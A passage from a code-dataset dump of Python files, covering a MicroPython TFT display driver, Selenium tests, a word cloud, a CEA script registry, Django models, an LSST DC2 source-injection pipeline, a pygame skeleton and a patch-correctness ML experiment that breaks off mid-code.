w > 128: w = 128\n if h > 160: h = 160\n tft._setwindowloc((0,0),(w - 1,h - 1))\n for row in range(h):\n if flip:\n pos = offset + (height - 1 - row) * rowsize\n else:\n pos = offset + row * rowsize\n if f.tell() != pos:\n dummy = f.seek(pos)\n for col in range(w):\n bgr = f.read(3)\n tft._pushcolor(TFTColor(bgr[2],bgr[1],bgr[0]))\n fname = filename.split(\"/\")\n tft.text((10, h-font[\"Height\"]-3),\n fname[1][:-4].upper(), TFT.YELLOW, font, 1,\n nowrap=True)\n\n # display text on screenpostion x,y in color and font\n def text(self, message, x, y, color=TFT.YELLOW, size=1, font=sysfont):\n self._tft.text((x, y), message,\n color, font, size,\n nowrap=True\n )\n\n\nif __name__ == '__main__':\n from machine import SPI\n # from machine import Pin\n # LoPy4 board specifications\n import lopy4board as board\n try:\n # create SPI-object\n spi = SPI(0, mode=SPI.MASTER, baudrate=TFT_SPEED) # defaults\n # __init__( self, spi, aDC, aReset, aCS)\n\n # TFT_DC = Pin('P22') # Pin.exp_board.G9\n # TFT_RST = Pin('P23') # Pin.exp_board.G10\n # TFT_CS = Pin('P12') # Pin.exp_board.G28\n # TFT_BLK = Pin('P21') # Pin.exp_board.G8\n # different Pins: display = DisplayTFT(spi, TFT_DC, TFT_RST, TFT_CS, TFT_BLK)\n display = DisplayTFT(spi) # use my default lopy4-pins\n display.displayOn()\n print(display.pins) # print my used default Pins for display\n # # Backlight on or off\n # display.displayOn(isOnOff=True)\n path = \"images/\"\n display.displayBMP(filename=path + 'woman.bmp')\n\n except OSError:\n print(\"File problem.\")\n\n except KeyboardInterrupt:\n print(\"User interrupt.\")\n # finally:\n # spi.deinit()\n # print(\"Done.\")\n","sub_path":"workshops/sample-code/examples/display/displaytft.py","file_name":"displaytft.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"259727463","text":"from tests.base_test import BaseTest\nfrom page_objects.search_results_page import SearchResultsPage\nfrom page_objects.product_details_page import ProductDetailsPage\n\n\nclass AllegroUnitTests(BaseTest, SearchResultsPage, ProductDetailsPage):\n\n def test_search_by_text(self):\n self.mainPage.search_by_name('iphone')\n self.assertTrue(self.is_product_on_list())\n\n def test_product_details_page(self):\n self.mainPage.search_by_name('iphone')\n self.mainPage.product_click()\n self.assertTrue(self.is_product_details_present())\n\n def test_going_to_next_page(self):\n self.mainPage.search_by_name('iphone')\n self.mainPage.going_to_next_page_check()\n self.assertTrue(self.is_page_num_2())\n\n\n\n\n # def test_next_page(self):\n # # testing next page\n # MainPage.search_by_name(self)\n # MainPage.going_to_next_page_check()\n # self.assertEqual(int(page_num2), 2)\n","sub_path":"tests/main_page_tests.py","file_name":"main_page_tests.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"158431439","text":"# coding=utf-8\nimport jieba\nimport matplotlib.pyplot as plt\nimport wordcloud\n\ndef word_cloudclass():\n #输入文件地址\n result = open('../data/procedure.txt',encoding=\"UTF-8\").read()\n my_cloud = wordcloud.WordCloud().generate(result)\n image = wordcloud.WordCloud(background_color='yellow',height=10,width=10,margin=90)\n plt.imshow(my_cloud)\n plt.axis(\"off\")\n plt.show()\n\nif __name__ == \"__main__\":\n word_cloudclass()\n\n\n","sub_path":"文本展示图/word_cloud.py","file_name":"word_cloud.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"415351136","text":"import matplotlib.pylab as plt\nimport numpy as np\nimport pandas as pd\nindex=pd.date_range('20200201','20200215')\ndata=[3,6,7,4,2,1,3,8,9,10,12,15,13,22,14]\n\nnp.random.seed(2)\ndata=np.random.randint(20,size=len(index))\nser_data=pd.Series(data,index=index)\nplt.figure(figsize=(15, 5))\nser_data.plot(style='r--')\nser_data.rolling(3).mean().plot(style='b')\n\n","sub_path":"Python数据分析从入门到精通/MR/Code/04/55/demo 扩展.py","file_name":"demo 扩展.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"107047463","text":"\"\"\"\nProvides the list of scripts known to the CEA - to be used by interfaces built on top of the CEA.\n\"\"\"\nfrom __future__ import print_function\n\nimport os\nimport cea\nimport cea.inputlocator\n\nSCRIPTS_PICKLE = os.path.abspath(os.path.join(os.path.dirname(cea.__file__), 'scripts.pickle'))\nSCRIPTS_YML = os.path.abspath(os.path.join(os.path.dirname(cea.__file__), 'scripts.yml'))\n\n\nclass CeaScript(object):\n def __init__(self, script_dict, category):\n self.name = script_dict['name']\n self.module = script_dict['module']\n self.description = script_dict.get('description', '')\n self.interfaces = script_dict.get('interfaces', ['cli'])\n self.label = script_dict.get('label', self.name)\n self.category = category\n self.parameters = script_dict.get('parameters', [])\n self.input_files = script_dict.get('input-files', [])\n\n def __repr__(self):\n return '' % self.name\n\n def print_script_configuration(self, config, verb='Running'):\n \"\"\"\n Print a list of script parameters being used for this run of the tool. Historically, each tool\n was responsible for printing their own parameters, but that requires manually keeping track of these\n parameters.\n \"\"\"\n print('City Energy Analyst version %s' % cea.__version__)\n script_name = self.name\n print(\"%(verb)s `cea %(script_name)s` with the following parameters:\" % locals())\n for section, parameter in config.matching_parameters(self.parameters):\n section_name = section.name\n parameter_name = parameter.name\n parameter_value = parameter.get()\n print(\"- %(section_name)s:%(parameter_name)s = %(parameter_value)s\" % locals())\n print(\" (default: %s)\" % parameter.default)\n\n def print_missing_input_files(self, config):\n schema_data = schemas()\n print()\n print(\"---------------------------\")\n print(\"ERROR: Missing input files:\")\n for method_name, path in self.missing_input_files(config):\n script_suggestions = (schema_data[method_name]['created_by']\n if 'created_by' in schema_data[method_name]\n else None)\n print('- {path}'.format(path=path))\n if script_suggestions:\n print(' (HINT: try running {scripts})'.format(path=path, scripts=', '.join(script_suggestions)))\n\n def missing_input_files(self, config):\n \"\"\"\n Return a list of bound :py:class:`cea.inputlocator.InputLocator` method names, one for each file required as\n input for this script that is not present yet as well as the applied path searched for.\n :return: Sequence[str]\n \"\"\"\n # get a locator without triggering the restricted to\n restricted_to = config.restricted_to\n config.restricted_to = None\n locator = cea.inputlocator.InputLocator(config.scenario)\n config.restricted_to = restricted_to\n\n for locator_spec in self.input_files:\n method_name, args = locator_spec[0], locator_spec[1:]\n method = getattr(locator, method_name)\n path = method(*self._lookup_args(config, locator, args))\n if not os.path.exists(path):\n yield [method_name, path]\n\n def _lookup_args(self, config, locator, args):\n \"\"\"returns a list of arguments to a locator method\"\"\"\n result = []\n for arg in args:\n if arg == 'building_name':\n result.append(locator.get_zone_building_names()[0])\n else:\n # expect an fqname for the config object\n result.append(config.get(arg))\n return result\n\n\ndef _get_categories_dict():\n \"\"\"Load the categories -> [script] mapping either from the YAML file or, in the case of dashboard,\n which don't support YAML, load from a pickled version generated on the call to ``cea install-toolbox``.\"\"\"\n try:\n import yaml\n from cea.utilities.yaml_ordered_dict import OrderedDictYAMLLoader\n categories = yaml.load(open(SCRIPTS_YML), OrderedDictYAMLLoader)\n except ImportError:\n import pickle\n categories = pickle.load(open(SCRIPTS_PICKLE))\n return categories\n\n\ndef list_scripts():\n \"\"\"List all scripts\"\"\"\n categories = _get_categories_dict()\n for category in categories.keys():\n for script_dict in categories[category]:\n yield CeaScript(script_dict, category)\n\n\ndef by_name(script_name):\n for script in list_scripts():\n # Convert script names that use \"_\" instead of \"-\"\n if script.name == script_name.replace(\"_\", \"-\"):\n return script\n raise cea.ScriptNotFoundException('Invalid script name: %s' % script_name)\n\n\ndef for_interface(interface='cli'):\n \"\"\"Return the list of CeaScript instances that are listed for the interface\"\"\"\n return [script for script in list_scripts() if interface in script.interfaces]\n\n\ndef schemas():\n \"\"\"Return the contents of the schemas.yml file\"\"\"\n import yaml\n schemas_yml = os.path.join(os.path.dirname(__file__), 'schemas.yml')\n return yaml.load(open(schemas_yml), Loader=yaml.CLoader)\n\n\ndef get_schema_variables(schema):\n \"\"\"\n This method returns a set of all variables within the schemas.yml. The set is organised by:\n (variable_name, locator_method, script, file_name:sheet_name)\n If the variable is from an input database, the script is replaced by \"-\"\n Also, if the variable is not from a tree data shape (such as xlsx or xls), the 'file_name:sheet_name' becomes 'file_name' only.\n The sheet_name is important to consider as a primary key for each variable can only be made through combining the 'file_name:sheet_name' and\n 'variable_name'. Along with the locator_method, the set should contain all information necessary for most tasks.\n \"\"\"\n\n schema_variables = set()\n for locator_method in schema:\n\n # if there is no script mapped to 'created_by', it must be an input_file\n # replace non-existent script with the name of the file without the extension\n if not schema[locator_method]['created_by']:\n script = \"-\"\n else:\n script = schema[locator_method]['created_by'][0]\n\n if not \"schema\" in schema[locator_method] or not schema[locator_method][\"schema\"]:\n print(\"Could not find schema for {locator_method}\".format(locator_method=locator_method))\n continue\n\n # for repetitive variables, include only one instance\n for variable in schema[locator_method]['schema']:\n if variable.find('srf') != -1:\n variable = variable.replace(variable, 'srf0')\n if variable.find('PIPE') != -1:\n variable = variable.replace(variable, 'PIPE0')\n if variable.find('NODE') != -1:\n variable = variable.replace(variable, 'NODE0')\n if variable.find('B0') != -1:\n variable = variable.replace(variable, 'B001')\n\n # if the variable is one associated with an epw file: exclude for now\n if schema[locator_method]['file_type'] == 'epw':\n variable = 'EPW file variables'\n\n # if the variable is actually a sheet name due to tree data shape\n if schema[locator_method]['file_type'] in {'xlsx', 'xls'}:\n worksheet = variable\n for variable_in_sheet in schema[locator_method]['schema'][worksheet]:\n file_name = \"{file_path}:{worksheet}\".format(file_path=schema[locator_method]['file_path'],\n worksheet=worksheet)\n schema_variables.add((variable_in_sheet, locator_method, script, file_name))\n # otherwise create the meta set\n else:\n\n file_name = schema[locator_method]['file_path']\n schema_variables.add((variable, locator_method, script, file_name))\n return schema_variables\n\n\ndef get_schema_scripts(schema):\n schema_scripts = set()\n for locator_method in schema:\n if len(schema[locator_method]['used_by']) > 0:\n for script in schema[locator_method]['used_by']:\n schema_scripts.add(script)\n if len(schema[locator_method]['created_by']) > 0:\n for script in schema[locator_method]['created_by']:\n schema_scripts.add(script)\n return schema_scripts","sub_path":"cea/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":8495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"265657196","text":"from __future__ import unicode_literals\n\nfrom django.db import models\n\n\n# Create your models here.\nclass Client(models.Model):\n name = models.CharField(max_length=20)\n\n def __str__(self):\n return self.name\n\n\nclass Equipement(models.Model):\n iPAddress = models.CharField(max_length=20)\n hostname = models.CharField(max_length=30)\n constructeur = models.CharField(max_length=20)\n clientID = models.ForeignKey(Client)\n\n\nclass ConfigurationGenerate(models.Model):\n configurationText = models.TextField()\n equipementId = models.ForeignKey(Equipement)\n date = models.DateTimeField()\n\n\nclass ConfiguationSendRequest(models.Model):\n ERROR = \"ERROR\"\n SUCCESS = \"SUCCESS\"\n IN_PROGRESS = \"IN PROGRESS\"\n STATUS_CHOICES = (\n (ERROR, 'Error'),\n (SUCCESS, 'Success'),\n (IN_PROGRESS, 'In Progress')\n )\n configurationText = models.TextField()\n addressIP = models.CharField(max_length=20)\n startTime = models.DateTimeField(null=True, blank=True)\n endTime = models.DateTimeField(null=True, blank=True)\n returnEquipment = models.TextField(null=True, blank=True)\n status = models.CharField(max_length=20, choices=STATUS_CHOICES, default=\"In Progress\")\n statusData = models.TextField(null=True, blank=True)\n\n def __str__(self):\n return \"%s: %s, %s\" % (self.id, self.addressIP, self.configurationText[:10])\n\n def jsonObject(self):\n pass\n\n\n\n","sub_path":"WebConf/WebConf/GenConf/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"567085996","text":"import os\nimport subprocess\n\nimport click\nimport numpy as np\n\nimport fitsio\nimport esutil.numpy_util\nimport sep\n\nfrom lsst.daf.persistence import Butler\nfrom sxdes import run_sep\nfrom ssi_tools.layout_utils import make_hexgrid_for_tract\nfrom fsi_tools.matching import do_balrogesque_matching\nfrom desc_dc2_dm_data import REPOS\n\nsep.set_extract_pixstack(1_000_000)\n\n# this list is hard coded - the gen 2 butler doesn't have a method for introspection\nDC2_TRACTS = set(\n [\n 2723, 2730, 2897, 2904, 3076, 3083, 3259, 3266, 3445, 3452, 3635, 3642, 3830,\n 3837, 4028, 4035, 4230, 4428, 4435, 4636, 4643, 4851, 4858, 5069, 2724, 2731,\n 2898, 2905, 3077, 3084, 3260, 3267, 3446, 3453, 3636, 3643, 3831, 4022, 4029,\n 4224, 4231, 4429, 4436, 4637, 4644, 4852, 4859, 5070, 2725, 2732, 2899, 2906,\n 3078, 3085, 3261, 3268, 3447, 3454, 3637, 3825, 3832, 4023, 4030, 4225, 4232,\n 4430, 4437, 4638, 4645, 4853, 4860, 5071, 2726, 2733, 2900, 2907, 3079, 3086,\n 3262, 3441, 3448, 3631, 3638, 3826, 3833, 4024, 4031, 4226, 4233, 4431, 4438,\n 4639, 4646, 4854, 5065, 5072, 3451, 2727, 2734, 2901, 2908, 3080, 3256, 3263,\n 3442, 3449, 3632, 3639, 3827, 3834, 4025, 4032, 4227, 4234, 4432, 4439, 4640,\n 4647, 4855, 5066, 5073, 2728, 2735, 2902, 3074, 3081, 3257, 3264, 3443, 3450,\n 3633, 3640, 3828, 3835, 4026, 4033, 4228, 4235, 4433, 4440, 4641, 4648, 4856,\n 5067, 5074, 2729, 2896, 2903, 3075, 3082, 3258, 3265, 3444, 3634, 3641, 3829,\n 3836, 4027, 4034, 4229, 4236, 4434, 4441, 4642, 4850, 4857, 5068,\n ]\n)\n\n# DC2 truth catalog to use as injected sources\nDC2_TRUTH_CAT = (\n \"/global/cfs/cdirs/lsst/groups/fake-source-injection/DC2/catalogs/\"\n \"cosmoDC2_v1.1.4_small_fsi_catalog.fits\"\n)\n\nOUTPUT_BUTLER = os.path.expandvars(os.path.join(\"$SCRATCH\", \"butler_coadd_sep\"))\nOUTPUT_DIR = \"ssi_cats\"\n\n\ndef _run_sep_and_add_radec(ti, img, zp, err=None, minerr=None):\n if err is None:\n err = np.sqrt(img.variance.array.copy())\n img = img.image.array.copy()\n\n if minerr is not None:\n msk = err < minerr\n err[msk] = minerr\n\n cat, seg = run_sep(\n img,\n err,\n )\n cat = esutil.numpy_util.add_fields(\n cat,\n [(\"ra\", \"f8\"), (\"dec\", \"f8\"), (\"mag_auto\", \"f8\")]\n )\n wcs = ti.getWcs()\n cat[\"ra\"], cat[\"dec\"] = wcs.pixelToSkyArray(cat[\"x\"], cat[\"y\"], degrees=True)\n cat[\"mag_auto\"] = zp - 2.5*np.log10(cat[\"flux_auto\"])\n return cat, seg\n\n\n@click.command()\n@click.option(\n '--tract', type=int, default=None, help='the tract to process', required=True\n)\n@click.option(\n '--patch', type=int, default=None, help='the patch to process', required=True\n)\n@click.option('--seed', type=int, default=None, help='seed for the RNG', required=True)\ndef main(tract, patch, seed):\n \"\"\"Run SSI on a DC2 tract and patch\"\"\"\n # first we need to extract the tract and patch from the butler in order to\n # setup the source catalog\n butler = Butler(REPOS[\"2.2i_dr6_wfd\"])\n skymap = butler.get(\"deepCoadd_skyMap\")\n\n if tract not in DC2_TRACTS:\n raise RuntimeError(\"Tract %d is not valid for DC2!\" % tract)\n\n ti = skymap[tract]\n\n if patch < 0 or patch >= len(ti):\n raise RuntimeError(\n \"patch %d is not valid for tract %d (has only %d patches)!\" % (\n patch, tract, len(tract)\n )\n )\n\n # now we are making the truth catalog\n # - we cut to things brighter than mag 25 to avoid injecting gobs of faint things\n # - we cut the injection catalog to the patch bounaries in order to avoid drawing\n # extra stuff\n # - we have to write the tract sources to disk for the stack task\n grid = make_hexgrid_for_tract(ti, rng=seed)\n srcs = fitsio.read(DC2_TRUTH_CAT)\n\n msk = srcs[\"rmagVar\"] <= 25\n srcs = srcs[msk]\n\n rng = np.random.RandomState(seed=seed)\n inds = rng.choice(len(srcs), size=len(grid), replace=True)\n tract_sources = srcs[inds].copy()\n tract_sources[\"raJ2000\"] = np.deg2rad(grid[\"ra\"])\n tract_sources[\"decJ2000\"] = np.deg2rad(grid[\"dec\"])\n\n pi = ti[patch]\n msk = pi.getOuterBBox().contains(grid[\"x\"], grid[\"y\"])\n tract_sources = tract_sources[msk]\n\n subprocess.run(\"mkdir -p \" + OUTPUT_DIR, shell=True, check=True)\n\n ssi_src_file = os.path.join(\n OUTPUT_DIR, \"ssi_input_tract%d_patch%d.fits\" % (tract, patch)\n )\n fitsio.write(\n ssi_src_file,\n tract_sources,\n clobber=True,\n )\n\n # now we need to run the SSI\n # for this we need to define an output butler area\n subprocess.run(\"mkdir -p \" + OUTPUT_BUTLER, shell=True, check=True)\n cmd = \"\"\"\\\ninsertFakes.py \\\n/global/cfs/cdirs/lsst/production/DC2_ImSim/Run2.2i/desc_dm_drp/v19.0.0-v1\\\n/rerun/run2.2i-coadd-wfd-dr6-v1 \\\n--output %s/ \\\n--id tract=%d patch=%s \\\nfilter=r -c fakeType=%s \\\n--clobber-config --no-versions\n\"\"\" % (OUTPUT_BUTLER, tract, \"%d,%d\" % pi.getIndex(), ssi_src_file)\n subprocess.run(cmd, shell=True, check=True)\n\n # from here we have images with the sources on disk\n # we are going to read them back in, make a few catalogs, and output the data\n output_butler = Butler(OUTPUT_BUTLER)\n bbox = pi.getOuterBBox()\n coaddId = {\n 'tract': ti.getId(),\n 'patch': \"%d,%d\" % pi.getIndex(),\n 'filter': 'r'\n }\n\n image = output_butler.get(\n \"deepCoadd_sub\", bbox=bbox, immediate=True, dataId=coaddId\n )\n fake_image = output_butler.get(\n \"fakes_deepCoadd_sub\", bbox=bbox, immediate=True, dataId=coaddId\n )\n zp = 2.5*np.log10(image.getPhotoCalib().getInstFluxAtZeroMagnitude())\n\n orig_det_cat, orig_det_seg = _run_sep_and_add_radec(ti, image, zp)\n ssi_det_cat, ssi_det_seg = _run_sep_and_add_radec(ti, fake_image, zp)\n ssi_truth_cat, ssi_truth_seg = _run_sep_and_add_radec(\n ti,\n (fake_image.image.array - image.image.array).copy(),\n zp,\n np.zeros_like(np.sqrt(fake_image.variance.array.copy())),\n minerr=np.mean(np.sqrt(fake_image.variance.array.copy())),\n )\n\n match_flag, match_index = do_balrogesque_matching(\n ssi_det_cat, orig_det_cat, ssi_truth_cat, \"flux_auto\",\n )\n\n ssi_det_cat = esutil.numpy_util.add_fields(\n ssi_det_cat,\n [(\"match_flag\", \"i4\"), (\"match_index\", \"i8\")]\n )\n ssi_det_cat[\"match_flag\"] = match_flag\n ssi_det_cat[\"match_index\"] = match_index\n\n output_fname = \"ssi_data_tract%d_patch%d.fits\" % (tract, patch)\n with fitsio.FITS(\n os.path.join(OUTPUT_DIR, output_fname), \"rw\", clobber=True\n ) as fits:\n fits.write(orig_det_cat, extname=\"orig_cat\")\n fits.write(ssi_det_cat, extname=\"ssi_cat\")\n fits.write(ssi_truth_cat, extname=\"truth_cat\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2020_07_16_coadd_sep/process_tract_patch.py","file_name":"process_tract_patch.py","file_ext":"py","file_size_in_byte":6766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"400211855","text":"import sys\nimport os.path\nfrom xsl_stat.collector import Collector\nfrom pymongo import MongoClient\n\n\ndef error(msg):\n print(msg)\n sys.exit(1)\n\n\ntry:\n interfaces_dir = sys.argv[1]\n\n if not os.path.exists(interfaces_dir):\n error(f\"File {interfaces_dir} doesn't exist\")\n\n client = MongoClient()\n db = client['stat']\n\n collector = Collector(interfaces_dir, db)\n collector.collect()\n\nexcept IndexError:\n error(f\"Usage: python3 {os.path.basename(sys.argv[0])} interfaces_dir\")\n","sub_path":"console/collect.py","file_name":"collect.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"419688868","text":"#pygame library\nimport pygame\n#pygame init for using pygame library\npygame.init()\n\n#Screen properties\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 800\nSCREEN_TITLE = \"Crossy RPG Game\"\n#ScreenColor as RGB codes\nWHITE_COLOR = (255,255,255)\nBLACK_COLOR = (0,0,0)\n#For fps \nclock= pygame.time.Clock()\nTICK_RATE = 144\nis_Game_Over = False\n\n#Create window with specified sizes\ngame_screen = pygame.display.set_mode((SCREEN_WIDTH,SCREEN_HEIGHT))\n#Set window color to white\ngame_screen.fill(WHITE_COLOR)\n#Set window title\npygame.display.set_caption(SCREEN_TITLE)\n#main loop to keep game running and screen updates\nwhile not is_Game_Over:\n\n #loot to get all event happening in screen\n for event in pygame.event.get():\n\n #For printing events\n #print(event)\n\n #if we have a quit type event then exit the game loop\n if event.type == pygame.QUIT:\n is_Game_Over = True\n #update all game graphics\n pygame.display.update()\n #tick the clock to update everythig within the game\n clock.tick(TICK_RATE)\n\n\n#Quit pygame and the program\npygame.quit()\nquit()\n","sub_path":"rpgGamePy.py","file_name":"rpgGamePy.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"442493356","text":"import experiment.config as config\nimport os\nfrom representation.word2vec import Word2vector\nimport pickle\nfrom scipy.spatial import distance\nfrom sklearn.metrics import roc_curve, auc, accuracy_score, recall_score, precision_score\nfrom sklearn.metrics import confusion_matrix, average_precision_score\nimport numpy as np\nimport experiment.ML4Prediciton as ML4Prediciton\nimport signal\nimport json\nimport random\nimport math\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport data\n\nclass Experiment:\n def __init__(self):\n self.cf = config.Config()\n self.path_patch = self.cf.path_patch\n if not 'Unique' in self.path_patch:\n raise ('please deduplicate it!')\n self.path_patch_sliced = self.cf.path_patch + '_sliced'\n # self.dict_b = {}\n self.bugReportText = None\n def evaluation_metrics(self, y_trues, y_pred_probs):\n fpr, tpr, thresholds = roc_curve(y_true=y_trues, y_score=y_pred_probs, pos_label=1)\n auc_ = auc(fpr, tpr)\n\n y_preds = [1 if p >= 0.5 else 0 for p in y_pred_probs]\n\n acc = accuracy_score(y_true=y_trues, y_pred=y_preds)\n prc = precision_score(y_true=y_trues, y_pred=y_preds)\n rc = recall_score(y_true=y_trues, y_pred=y_preds)\n f1 = 2 * prc * rc / (prc + rc)\n\n print('\\n***------------***')\n print('Evaluating AUC, F1, +Recall, -Recall')\n print('Test data size: {}, Incorrect: {}, Correct: {}'.format(len(y_trues), y_trues.count(0), y_trues.count(1)))\n print('Accuracy: %f -- Precision: %f -- +Recall: %f -- F1: %f ' % (acc, prc, rc, f1))\n tn, fp, fn, tp = confusion_matrix(y_trues, y_preds).ravel()\n recall_p = tp / (tp + fn)\n recall_n = tn / (tn + fp)\n print('AUC: {:.3f}, +Recall: {:.3f}, -Recall: {:.3f}'.format(auc_, recall_p, recall_n))\n # return , auc_\n\n # print('AP: {}'.format(average_precision_score(y_trues, y_pred_probs)))\n return recall_p, recall_n, acc, prc, rc, f1, auc_\n\n def save_bugreport_deprecated(self, project, embedding_method):\n file_name = '../data/bugreport_dict_'+embedding_method+'.pickle'\n if os.path.exists(file_name):\n return\n w = Word2vector(embedding_method)\n dict_b = {}\n path = '../preprocess/' + project + '_bugreport.txt'\n with open(path, 'r+') as f:\n for line in f:\n project_id = line.split(',')[0]\n bugReport = line.split(',')[1]\n learned_vector = w.embedding(bugReport)\n dict_b[project_id] = learned_vector\n pickle.dump(dict_b, open(file_name, 'wb'))\n\n def save_bugreport(self,):\n file_name = '../data/bugreport_dict.pickle'\n if os.path.exists(file_name):\n return\n # w = Word2vector(embedding_method)\n dict_b = {}\n path = 'data/BugReport'\n files = os.listdir(path)\n for file in files:\n if not file.endswith('bugreport.txt'):\n continue\n path_bugreport = os.path.join(path, file)\n with open(path_bugreport, 'r+') as f:\n for line in f:\n project_id = line.split('$$')[0]\n bugReportSummary = line.split('$$')[1].strip('\\n')\n bugReportDescription = line.split('$$')[2].strip('\\n')\n dict_b[project_id] = [bugReportSummary, bugReportDescription]\n pickle.dump(dict_b, open(file_name, 'wb'))\n\n\n def predict_10fold(self, embedding_method, algorithm):\n dataset = pickle.load(open('../data/bugreport_patch_'+embedding_method+'.pickle', 'rb'))\n bugreport_vector = np.array(dataset[0]).reshape((len(dataset[0]),-1))\n commit_vector = np.array(dataset[1]).reshape((len(dataset[1]),-1))\n labels = np.array(dataset[2])\n\n # combine bug report and commit message of patch\n features = np.concatenate((bugreport_vector, commit_vector), axis=1)\n cl = ML4Prediciton.Classifier(features, labels, algorithm, 10)\n cl.cross_validation()\n\n def predict_leave1out(self, embedding_method, times, algorithm):\n dataset_json = pickle.load(open('../data/bugreport_patch_json_' + embedding_method + '.pickle', 'rb'))\n # leave one out\n project_ids = list(dataset_json.keys())\n number = len(project_ids)\n accs, prcs, rcs, f1s, aucs = list(), list(), list(), list(), list()\n rcs_p, rcs_n = list(), list()\n for i in range(times):\n random.shuffle(project_ids)\n train_ids = project_ids[:int(0.9*number)]\n test_ids = project_ids[int(0.9*number):]\n\n train_features, train_labels = [], []\n for train_id in train_ids:\n value = dataset_json[train_id]\n bugreport_vector = value[0]\n for m in range(1, len(value)):\n commit_vector, label = value[m][0], value[m][1]\n features = np.concatenate((bugreport_vector, commit_vector), axis=1)\n\n train_features.append(features[0])\n train_labels.append(label)\n train_features = np.array(train_features)\n\n test_features, test_labels = [], []\n for test_id in test_ids:\n value = dataset_json[test_id]\n bugreport_vector = value[0]\n for n in range(1, len(value)):\n commit_vector, label = value[n][0], value[n][1]\n features = np.concatenate((bugreport_vector, commit_vector), axis=1)\n\n test_features.append(features[0])\n test_labels.append(label)\n test_features = np.array(test_features)\n # dataset = np.concatenate((train_features, test_features), axis=0)\n labels = train_labels+test_labels\n\n if i == 0:\n print('All data size: {}, Incorrect: {}, Correct: {}'.format(len(labels), labels.count(0),\n labels.count(1)))\n print('Algorithm: {}'.format(algorithm))\n print('#####')\n\n cl = ML4Prediciton.Classifier(None, None, algorithm, None, train_features, train_labels, test_features, test_labels)\n auc_, recall_p, recall_n, acc, prc, rc, f1 = cl.leave1out_validation()\n accs.append(acc)\n prcs.append(prc)\n rcs.append(rc)\n f1s.append(f1)\n\n aucs.append(auc_)\n rcs_p.append(recall_p)\n rcs_n.append(recall_n)\n\n print('')\n print('{} leave one out mean: '.format('10-90'))\n print('Accuracy: {:.1f} -- Precision: {:.1f} -- +Recall: {:.1f} -- F1: {:.1f} -- AUC: {:.3f}'.format(\n np.array(accs).mean() * 100, np.array(prcs).mean() * 100, np.array(rcs).mean() * 100,\n np.array(f1s).mean() * 100, np.array(aucs).mean()))\n print('AUC: {:.3f}, +Recall: {:.3f}, -Recall: {:.3f}'.format(np.array(aucs).mean(), np.array(rcs_p).mean(),\n np.array(rcs_n).mean()))\n print('---------------')\n\n def predict_leave1out_10fold(self, embedding_method, times, algorithm, ASE):\n dataset_json = pickle.load(open('data/bugreport_patch_json_' + embedding_method + '.pickle', 'rb'))\n # ASE_features = pickle.load(open('../data/ASE_features_'+embedding_method+'.pickle', 'rb'))\n ASE_features = pickle.load(open('data/ASE_features_bert.pickle', 'rb'))\n # leave one out\n project_ids = list(dataset_json.keys())\n n = len(project_ids)\n accs, prcs, rcs, f1s, aucs = list(), list(), list(), list(), list()\n a_accs, a_prcs, a_rcs, a_f1s, a_aucs = list(), list(), list(), list(), list()\n rcs_p, rcs_n = list(), list()\n a_rcs_p, a_rcs_n = list(), list()\n random.seed(1)\n random.shuffle(project_ids,)\n n = int(math.ceil(len(project_ids) / float(times)))\n groups = [project_ids[i:i+n] for i in range(0, len(project_ids), n)]\n\n for i in range(times):\n test_group = groups[i]\n train_group = groups[:i] + groups[i+1:]\n\n test_ids = test_group\n train_ids = []\n for j in train_group:\n train_ids += j\n\n train_features, train_labels = [], []\n ASE_train_features, ASE_train_labels = [], []\n for train_id in train_ids:\n value = dataset_json[train_id]\n bugreport_vector = value[0]\n for p in range(1, len(value)):\n commit_vector, label = value[p][0], value[p][1]\n features = np.concatenate((bugreport_vector, commit_vector), axis=1)\n # features = commit_vector\n\n train_features.append(features[0])\n train_labels.append(label)\n\n if ASE:\n try:\n ASE_value = ASE_features[train_id]\n for p in range(len(ASE_value)):\n ASE_vector, ASE_label = ASE_value[p][0], ASE_value[p][1]\n\n ASE_train_features.append(np.array(ASE_vector))\n ASE_train_labels.append(ASE_label)\n except Exception as e:\n print(e)\n\n train_features = np.array(train_features)\n ASE_train_features = np.array(ASE_train_features)\n\n test_features, test_labels = [], []\n ASE_test_features, ASE_test_labels = [], []\n for test_id in test_ids:\n value = dataset_json[test_id]\n bugreport_vector = value[0]\n for v in range(1, len(value)):\n commit_vector, label = value[v][0], value[v][1]\n features = np.concatenate((bugreport_vector, commit_vector), axis=1)\n # features = commit_vector\n\n test_features.append(features[0])\n test_labels.append(label)\n\n if ASE:\n try:\n ASE_value = ASE_features[test_id]\n for p in range(len(ASE_value)):\n ASE_vector, ASE_label = ASE_value[p][0], ASE_value[p][1]\n\n ASE_test_features.append(np.array(ASE_vector))\n ASE_test_labels.append(ASE_label)\n except Exception as e:\n print(e)\n test_features = np.array(test_features)\n ASE_test_features = np.array(ASE_test_features)\n # dataset = np.concatenate((train_features, test_features), axis=0)\n labels = train_labels+test_labels\n # ASE_labels = ASE_train_labels+ASE_test_labels\n\n if i == 0:\n print('All data size: {}, Incorrect: {}, Correct: {}'.format(len(labels), labels.count(0),\n labels.count(1)))\n print('Algorithm: {}'.format(algorithm))\n print('#####')\n\n # 1. machine learning classifier\n cl = 